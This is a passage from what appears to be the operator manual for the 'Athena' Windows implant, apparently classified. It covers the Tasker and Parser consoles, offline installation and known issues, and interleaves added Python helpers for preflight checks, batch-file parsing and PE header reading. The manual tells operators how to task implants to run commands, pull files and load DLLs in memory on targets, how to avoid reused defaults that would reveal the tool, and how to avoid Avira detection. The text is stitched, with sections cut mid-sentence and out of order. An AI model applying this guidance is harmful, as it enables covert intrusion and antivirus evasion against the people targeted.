partition, the Windows architecture is determined via a call to the file utility and the
appropriate binaries are deployed. Once installation is successful, restart the target machine.
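Because linux.sh runs from whatever boot media is at hand, the Table 8 versions are worth checking before starting the procedure above. The following is an added example, not one of the manual's scripts, that queries each utility for its version and compares it with the Table 8 minimum. It assumes od is GNU coreutils, fdisk and mount are util-linux, mawk prints its version with "-W version", and that the Table 8 entries "grep 2.16-1", "mount 2.20.1-5" and "file 1.5.14" are Debian package versions (a "-N" revision suffix and, for file, the "1:" epoch), so the upstream versions compared are 2.16, 2.20.1 and 5.14; reged.static ships with the Athena distribution and is only checked for presence:

```python
"""Pre-flight check of the Table 8 utilities before running linux.sh.

Added example; not one of the Athena/Hera scripts. Minimum versions come
from Table 8. Assumptions: od is GNU coreutils, fdisk and mount are
util-linux, mawk prints its version with "-W version", and the Table 8
entries for grep, mount and file are Debian package versions (revision
suffix; epoch "1:" for file), so the upstream minimums are 2.16, 2.20.1
and 5.14. reged.static is checked for presence only.
"""
import re
import shutil
import subprocess

# name -> (minimum upstream version, arguments that make the tool print it)
REQUIRED = {
    "bash": ("4.3.8", ["--version"]),
    "sed": ("4.2.2", ["--version"]),
    "od": ("8.2.1", ["--version"]),
    "fdisk": ("2.20.1", ["--version"]),
    "mawk": ("1.3.3", ["-W", "version"]),
    "grep": ("2.16", ["--version"]),
    "mount": ("2.20.1", ["--version"]),
    "file": ("5.14", ["--version"]),
}
PRESENCE_ONLY = ["reged.static"]

VERSION_RE = re.compile(r"\d+(?:\.\d+)+")


def parse_version(text):
    """First dotted number in a version banner as a tuple of ints, or None.

    Handles banners such as "GNU bash, version 4.3.11(1)-release",
    "od (GNU coreutils) 8.21", "mawk 1.3.3 Nov 1996" and "file-5.14".
    """
    match = VERSION_RE.search(text)
    if not match:
        return None
    return tuple(int(part) for part in match.group(0).split("."))


def version_ok(found, minimum):
    """Component-wise comparison; missing trailing components count as zero."""
    width = max(len(found), len(minimum))

    def pad(version):
        return version + (0,) * (width - len(version))

    return pad(found) >= pad(minimum)


def check_tool(name, minimum, args):
    """Return (name, status, detail); status is one of ok, old, missing, unknown."""
    if shutil.which(name) is None:
        return name, "missing", ""
    try:
        proc = subprocess.run([name] + args, stdout=subprocess.PIPE,
                              stderr=subprocess.STDOUT, universal_newlines=True,
                              timeout=5)
    except (OSError, subprocess.SubprocessError):
        return name, "unknown", "version query failed"
    found = parse_version(proc.stdout)
    if found is None:
        return name, "unknown", "no version string in output"
    status = "ok" if version_ok(found, parse_version(minimum)) else "old"
    return name, status, ".".join(str(part) for part in found)


def preflight(required=REQUIRED, presence_only=PRESENCE_ONLY):
    """Run every check; returns (all_ok, [(name, status, detail), ...])."""
    results = [check_tool(name, minimum, args)
               for name, (minimum, args) in required.items()]
    for name in presence_only:
        results.append((name, "ok" if shutil.which(name) else "missing", ""))
    return all(status == "ok" for _, status, _ in results), results


if __name__ == "__main__":
    all_ok, results = preflight()
    for name, status, detail in results:
        print(f"{name:<14}{status:<9}{detail}")
    print("READY" if all_ok else "NOT READY: fix the entries above before running linux.sh")
```

Run it from the booted Linux media before ./linux.sh; any line other than "ok" names the utility to replace or upgrade. The comparison pads shorter tuples with zeros, so coreutils "8.21" satisfies the "8.2.1" minimum the table lists.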
8. (U) Tasker
(S//NF) Some general usage comments are presented below:
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion; reusing
defaults unmodified across multiple operations may present a signature that could identify the
presence of Athena in a network.
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.
(S//NF) By default, the Tasker allows the Operator to interactively build tasking for an implant
or implant family. Alternatively, the operator can also input tasking via a scripted tasking file.
>python.exe tasker.py -h
usage: tasker.py [-h] [-r RECEIPT] [-s SCRIPT] [-g GENERATE] [-p PRIORITY]
[-x] [-e] [--id ID] [--debug]
Tasker Configuration
optional arguments:
-h, --help show this help message and exit
-r RECEIPT, --receipt RECEIPT
This argument defines an existing receipt filename to
be used for processing.
-i SCRIPT, --import SCRIPT
This argument provides the ability to import a script
for processing.
-g GENERATE, --generate GENERATE
This argument provides the output path location.
-p PRIORITY, --priority PRIORITY
This argument provides ability to set the
priority/ordering (0..255) NOTE: 128->default and
0->highest.
-x, --persist This argument provides ability to set the batch as a
persistent batch.
-e, --stoponerror This argument provides ability to stop the batch on a
command execution error.
--id ID This argument provides the ability to force a specific
initial task ID for a tasking session (usually just
used for debugging purposes - number is decoded as
hex).
--debug This argument allows debugging information to be
included in the output directory.
Usage: python.exe tasker.py
8.2.7 (U) ID
(S//NF) This argument provides the ability to force a specific initial task ID for a tasking
session (usually just used for debugging purposes - number is decoded as hex).
8.3 (U) User Interface
(S//NF) The Tasker shell provides an interactive processing mode with two ways to enter input.
Typing the name of a management or command feature and pressing Enter starts a wizard that
prompts for every option the feature requires. Alternatively, advanced users can enter a
complete command on a single line, with tab completion. The single-line syntax for command
features is identical to the script output format.
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
Output:
New Receipt Loaded:
Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Parent ID: test
   during a beacon cycle. This has lower priority than other batch commands
   waiting for processing.
Stop On Error (bool): true - do not continue processing the batch on a command failure;
   false - continue processing all batch commands regardless of error status.
Output Path: location where the batch information is stored (default: .\tasker_output)
Usage: generate priority=128 persist=false stoponerror=false output=.\tasker\output
Example: generate
[generate] - output binary batch file for a specific target
Description: prioritize this batch request on LP (0-high, 255-low)
Default: 128
priority (number 0..255):
Description: persist this batch on LP - do not delete after transfer
Default: False
persist (bool):
Description: Stop executing this batch on a command error
Default: False
stoponerror (bool):
Description: specific path to store batch (binary file and script)
Default: tasker_output
output path (string):
PATH: d:\Development\Athena\console\tasker\tasker_output\test
RSA encrypting header with client public key
BINARY: __128_test_ABCD0064_63A95A3C
SCRIPT: __128_test_ABCD0064_63A95A3C_script.txt
BATCH: 63A95A3C
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0
Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Parent ID: test
8.3.1.3 (U) LS
(S//NF) This command will list the batch id and all commands defined for this batch. They are
numbered from zero and can be referenced by this index.
Usage: ls
Example: ls
Output:
BATCH: DAD72903
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0
8.3.1.4 (U) RM
(S//NF) This command removes a command from the current batch. Each command is referenced
by a zero-based index, which can be viewed with the LS command shown above. A single rm
invocation removes exactly one command from the batch.
Usage: rm <index>
Example: rm 1
Output:
REMOVED: uninstall pre=0
8.3.1.6 (U) ID
(S//NF) The ID command is used to force a specific batch ID for the Tasker to generate. This
command is generally used for debug purposes only.
Usage: id <hex>
Example: id 12345678
Output:
New Batch ID=0x12345678
Output:
COMMAND: get flag=0 filename="c:\temp\myfile.txt"
8.3.2.5 (U) Memunload
(S//NF) This command will unload a loaded module based on the nickname provided in the
memload command. WARNING: The nickname is case sensitive.
Usage: memunload pre=0 nickname=<string>
Example:
[memunload] - unload a DLL already loaded on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: specific nickname used during memload
nickname (string):mymodule
Output:
COMMAND: memunload pre=0 nickname="mymodule"
Description: specific name of configuration
name:interval
Description: specific value for the configuration
value (number):20000
Output:
COMMAND: set pre=0 post=0 interval=20000
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
tasker::no receipt>receipt builder_output\e0Eo\receipt.xml
New Receipt Loaded:
Receipt File: builder_output\e0Eo\receipt.xml
Parent ID: e0Eo
tasker::e0Eo>execute
[execute] - execute a command on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: specific application name on target to execute
filename (string):ipconfig
Description: specific arguments used with this command
arguments (string):/all
COMMAND: execute pre=0 post=0 filename="ipconfig" arguments="/all"
Figure 18 - (S//NF) Tasker Shell Interface Example Part 1
OR
>python.exe tasker.py
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
tasker::e0Eo>generate
[generate] - output binary batch file for a specific target
Description: prioritize this batch request on LP (0-high, 255-low)
Default: 128
priority (number 0..255):
Description: persist this batch on LP - do not delete after transfer
Default: False
persist (bool):
Description: Stop executing this batch on a command error
Default: False
stoponerror (bool):
Description: specific path to store batch (binary file and script)
Default: tasker_output
output path (string):
PATH: d:\Development\Athena\athena_suite\tasker_output\e0Eo
RSA encrypting header with client public key
BINARY: __128_e0Eo_1111
SCRIPT: __128_e0Eo_1111_script.txt
BATCH: 00001111
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
Figure 19 - (S//NF) Tasker Shell Interface Example Part 2
8.5 (U) Output
(S//NF) The Tasker produces a binary file (no extension) and a text file (.txt). The binary file
is copied to the Listening Post, from which the target downloads it. The text file is an
unencrypted textual reference of the commands in the batch; it can serve as a historical record
or be fed back into the Tasker to generate a duplicate batch.
Field     Type    Description
+         flag    A leading plus sign tells the server that the file is persistent; the server
                  will not delete it after processing (e.g., +_128). The examples above,
                  generated with persist=false, begin with an underscore instead.
Priority  number  The batch priority: 0 is highest and 255 lowest (128 is the default).
Parent    string  The target parent ID. It must match the parent ID reference in the directory.
Child     hex     The target child ID as a hex string. It must match the child ID reference in
                  the directory.
Batch     hex     The batch ID as a hex string. It is a random number that prevents duplicate
                  batches.
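The batch file name and the companion _script.txt are the two Tasker artifacts an analyst is most likely to meet on a Listening Post or in a recovered staging directory. The following is an added example (not part of the Athena tool set) that parses both and cross-checks the batch ID between them. It assumes a Parent ID contains no underscore and that the child segment may be absent, as in the page's own "__128_e0Eo_1111" example; both are assumptions, not documented rules.

```python
"""Parse the Tasker's generate artifacts: batch file name and *_script.txt.

Added example, not Athena code. File name layout (Section 8.5):
  [+|_]_<priority>_<parent>[_<child>]_<batch>[_script.txt]
Assumptions: no underscore inside a Parent ID; child segment optional.
"""
import re

COMMAND_FEATURES = {"execute", "get", "put", "memload", "memunload",
                    "set", "delete", "uninstall"}

# '+' = keep on the LP after transfer, '_' = delete; then priority 0..255.
_NAME_RE = re.compile(
    r"^(?P<persist>[+_])_(?P<priority>\d{1,3})_(?P<rest>.+?)(?P<script>_script\.txt)?$")
# "<index>: <command> key=value key="quoted value" ..."
_LINE_RE = re.compile(r"^\s*(?P<idx>\d+):\s*(?P<cmd>\w+)(?P<args>.*)$")
_KV_RE = re.compile(r'(?P<key>\w+)=(?:"(?P<quoted>[^"]*)"|(?P<bare>\S+))')


def parse_batch_filename(name):
    """Split a batch (or script) file name into fields; None if it does not fit."""
    m = _NAME_RE.match(name)
    if not m:
        return None
    priority = int(m["priority"])
    if priority > 255:
        return None
    parts = m["rest"].split("_")
    if len(parts) == 3:
        parent, child, batch = parts
    elif len(parts) == 2:                     # no child segment (assumption)
        parent, batch = parts
        child = None
    else:
        return None
    try:
        batch_id = int(batch, 16)
    except ValueError:
        return None
    return {"persist": m["persist"] == "+", "priority": priority,
            "parent": parent, "child": child, "batch": batch_id,
            "is_script": m["script"] is not None}


def parse_script_line(line):
    """Parse one numbered command line into index, command and keyword args."""
    m = _LINE_RE.match(line)
    if not m or m["cmd"] not in COMMAND_FEATURES:
        return None
    args = {}
    for kv in _KV_RE.finditer(m["args"]):
        value = kv["quoted"] if kv["quoted"] is not None else kv["bare"]
        # Delays and flags are plain numbers; paths and arguments stay strings.
        args[kv["key"]] = int(value) if value.isdigit() else value
    return {"index": int(m["idx"]), "command": m["cmd"], "args": args}


def parse_script(text):
    """Parse a whole *_script.txt: the BATCH line plus the numbered commands."""
    batch_id, commands = None, []
    for line in text.splitlines():
        if line.startswith("BATCH:"):
            batch_id = int(line.split(":", 1)[1].strip(), 16)
        else:
            cmd = parse_script_line(line)
            if cmd is not None:
                commands.append(cmd)
    return {"batch": batch_id, "commands": commands}


def script_matches_filename(name, text):
    """True when the BATCH id inside the script equals the id in the file name."""
    meta, script = parse_batch_filename(name), parse_script(text)
    return (meta is not None and script["batch"] is not None
            and meta["batch"] == script["batch"])


# Constructed sample, copied from the generate example in Section 8.3.
SAMPLE_SCRIPT = """BATCH: 63A95A3C
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0
"""

if __name__ == "__main__":
    print(parse_batch_filename("__128_test_ABCD0064_63A95A3C_script.txt"))
    for cmd in parse_script(SAMPLE_SCRIPT)["commands"]:
        print(cmd)
    print("consistent:", script_matches_filename(
        "__128_test_ABCD0064_63A95A3C_script.txt", SAMPLE_SCRIPT))
```

A file whose name parses but whose embedded BATCH id disagrees with the name, or whose command set falls outside the eight command features, is worth a second look: it is either not a Tasker product or has been edited after generation.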
9. (U) Parser
(S//NF) Some general usage comments are presented below:
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion;
reusing it unmodified across multiple operations may create a signature that identifies the
presence of Athena in a network.
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.
(S//NF) By default, the Parser will use the local directory for input and output directory
locations. A single receipt file or directory of receipt files can be included as a command line
option. By default, the builder_output\receipts directory will be used to process receipts built
with the Builder.
Parser Tool
usage: parser.py [-h] [-r RECEIPT] [-i INPUT] [-d] [-o OUTPUT] [-m]
Parser Configuration
optional arguments:
-h, --help show this help message and exit
-r RECEIPT, --receipt RECEIPT
This argument defines an existing receipt filename or
directory of receipts to be used for processing.
-i INPUT, --input INPUT
This argument provides the ability to import a file
or directory of files.
-d, --debug Enable decoding of unencrypted files from target
-o OUTPUT, --output OUTPUT
This argument provides the output path location.
-m, --nomark This argument provides the ability to reuse a
processed directory. By default, the parsing code
will mark processed files with a date prefix (e.g.
20150908_1010_{30996559-C169-490B-A40B-4ADB597E0D19}).
9.2.2 (U) INPUT
(S//NF) This argument provides the ability to import a file or directory of files into the Parser.
By default, the Parser will search the parser_input directory for files that are not marked.
Modify Time: Mon Dec 21 22:08:02 2015 GMT
Create Time: Mon Dec 21 22:08:02 2015 GMT
File Size: 18 bytes
Output Filename:
d:\Development\Athena\Tests\TestCommandEngine\parser_output\test\ABCD0086\responses\20151221_17_10_01_0375_get.bin
9.4.4 (U) Memload
(S//NF) An example of the Parser output from a successful Memload command is shown below:
Batch ID = 0x55555555
Command ID = 0x00000000
Command Type = memload
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:07 2015 GMT
Memory Address = 0x10000000
Nickname = testdll nickname
Batch ID = 0x44444444
Command ID = 0x00000001
Command Type = execute
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:02 2015 GMT
Filename = %systemroot%\system32\net.exe
Process Return Code = 0x00000000
<<STDIN/OUT/ERROR>>
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
Unavailable Z: \\10.3.2.91\Athena Microsoft Windows Network
The command completed successfully.
0xA0000102 Size too big
0xA0000103 Out of memory
0xA0000104 Disk Error invalid disk name or ram only
10.2 (U) Installer and RAM_ONLY Versions Should Never Be Run From Disk
(S//NF) Copying the Installer or the RAM_ONLY version of the implant to the target computer
and then executing either application from disk will generate an alert when Avira is the PSP.
Avira flags the size of the data section as being too large and thus possibly malware. Avira does
not flag the size of the implant data section when these applications are run from memory as
intended.
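Two points in this manual come down to reading a PE header: the offline installer decides which binaries to deploy from the Windows architecture of the selected partition (it does so by calling the file utility), and the Avira alert described above keys on the size of the implant's data section when the Installer or RAM_ONLY build is started from disk. The following is an added example (not part of the Athena tool set) that reads the COFF header and section table directly instead of shelling out to file, reports the architecture, and flags writable sections whose in-memory size dwarfs their on-disk size. The "oversized" thresholds and the choice of ntoskrnl.exe as the probe file are assumptions, not Avira's rule or the installer's method; the constructed sample images are header-only and not loadable.

```python
"""Read a PE header: architecture and section sizes.

Added example, not Athena code. Thresholds in oversized_data_sections()
are an assumed heuristic for a "data section too large" check.
"""
import os
import struct

MACHINE = {0x014C: "x86", 0x8664: "x64", 0xAA64: "arm64"}
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data):
    """Return machine, PE32/PE32+ flag and the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    (magic,) = struct.unpack_from("<H", data, coff + 20)   # optional header magic
    sections = []
    for i in range(nsec):
        off = coff + 20 + opt_size + 40 * i
        name, vsize, vaddr, rsize, rptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": vaddr,
                         "raw_size": rsize, "raw_pointer": rptr,
                         "characteristics": flags})
    return {"machine": machine, "arch": MACHINE.get(machine, "unknown"),
            "pe32plus": magic == 0x20B, "sections": sections}


def oversized_data_sections(pe, max_virtual=8 << 20, min_ratio=16):
    """Names of writable sections that are huge in memory or far larger in
    memory than on disk (assumed heuristic, not the vendor's)."""
    hits = []
    for s in pe["sections"]:
        if not s["characteristics"] & IMAGE_SCN_MEM_WRITE:
            continue
        if (s["virtual_size"] >= max_virtual
                or s["virtual_size"] >= min_ratio * max(s["raw_size"], 1)):
            hits.append(s["name"])
    return hits


def windows_arch(mount_root, probe=os.path.join("Windows", "System32", "ntoskrnl.exe")):
    """Architecture of a mounted Windows partition, read from a system binary.
    Assumption: the probe file exists under mount_root with that exact case."""
    with open(os.path.join(mount_root, probe), "rb") as fh:
        return parse_pe(fh.read(64 * 1024))["arch"]


def build_min_pe(machine, sections):
    """Construct a header-only PE image for testing (parseable, not loadable).
    sections: (name, virtual_size, raw_size, characteristics) tuples."""
    pe32plus = machine in (0x8664, 0xAA64)
    opt_size = 240 if pe32plus else 224
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, 0x1000 * (i + 1), rsize,
                    0, 0, 0, 0, 0, flags)
        for i, (name, vsize, rsize, flags) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


# Constructed samples: an ordinary x86 image, and an x64 image whose writable
# .data section claims 64 MiB in memory but carries only 512 bytes on disk.
SAMPLE_X86 = build_min_pe(0x014C, [(b".text", 0x1000, 0x1000, 0x60000020),
                                   (b".data", 0x1000, 0x1000, 0xC0000040)])
SAMPLE_X64 = build_min_pe(0x8664, [(b".text", 0x1000, 0x1000, 0x60000020),
                                   (b".data", 64 << 20, 0x200, 0xC0000040)])

if __name__ == "__main__":
    for label, img in (("x86", SAMPLE_X86), ("x64", SAMPLE_X64)):
        pe = parse_pe(img)
        print(label, pe["arch"], "PE32+" if pe["pe32plus"] else "PE32",
              "oversized:", oversized_data_sections(pe))
```

On a Linux boot disk with the Windows volume mounted at /mnt/win, windows_arch("/mnt/win") gives the same answer the installer derives from file, without depending on the file version in Table 8. The section check is a triage aid only: a large, mostly-unbacked writable section is exactly what a RAM_ONLY image looks like on disk, which is why the guidance here is to never run it from disk in the first place.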
10.3 (U) Builder Does Not Produce a Bit Copy of an Existing Configured Implant
(S//NF) The Builder can ingest the configuration file of an existing implant and copy its
configuration settings into a new implant. The new implant will not, however, be a bit-for-bit
copy of the original. An exact copy is not possible by design: the implant is built to ensure
entropy between instances of the tool. The only way to reproduce a bit copy of an existing
implant would be to leave a large section of zero bytes in the configured implant, which would
give an easy way to correlate instances of the tool.
to complete transferring the entire file to the LP before the duration timer expires when the file is
very large. Care should be taken to select values consistent with the operational environment
when configuring the chunk size (maximum number of bytes in a single block), command
execution timeout (terminates processing of long running commands), and batch execution
timeout (terminates processing of long running batches). A good operational practice would be
to assign reasonable values for these settings early in the batch when a large file is being
retrieved.